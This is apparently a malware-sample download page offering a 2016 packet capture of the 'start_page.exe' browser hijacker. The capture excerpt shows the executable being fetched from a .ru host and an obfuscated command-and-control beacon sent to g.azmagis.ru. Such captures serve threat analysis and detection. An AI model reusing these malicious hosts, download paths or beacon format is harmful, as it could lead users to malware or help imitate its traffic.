Text Example

start_page.exe Malware Browser Hijacker g.azmagis.ru PCAP Download Traffic Sample

Download Attachments

  • 1 pcap startpage
    start_page.exe Malware Browser Hijacker g.azmagis.ru PCAP Download Traffic Sample
    Date added: October 23, 2016 6:11 am Added by: admin File size: 30 KB Downloads: 81

 

 

2016-10-23 00:58:22.814458 IP 192.168.1.102.58766 > 82.118.16.20.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET /start_page.exe HTTP/1.1
E..WQ.@……..fRv…..PJ…J.N.P…G}..GET /start_page.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: tdrvmizfzhzm.fewservice.ru
Connection: Keep-Alive

2016-10-23 00:58:31.076457 IP 192.168.1.102.58768 > 185.20.186.52.80: Flags [P.], seq 0:500, ack 1, win 256, length 500: HTTP: GET /%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6%e6%d3%33%e2%33%53%62%76%57%96%46%d3%66%56%73%13%66%36%56%23%23%53%63%36%43%66%73%03%26%93%46%26%73%36%16%63%46%46%43%56%53%63%63%66%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
E…A.@….q…f…4…P…&.s..P…U…GET /%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6%e6%d3%33%e2%33%53%62%76%57%96%46%d3%66%56%73%13%66%36%56%23%23%53%63%36%43%66%73%03%26%93%46%26%73%36%16%63%46%46%43%56%53%63%63%66%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: start_page 3.35
Host: g.azmagis.ru
Cache-Control: no-cache

Leave a Reply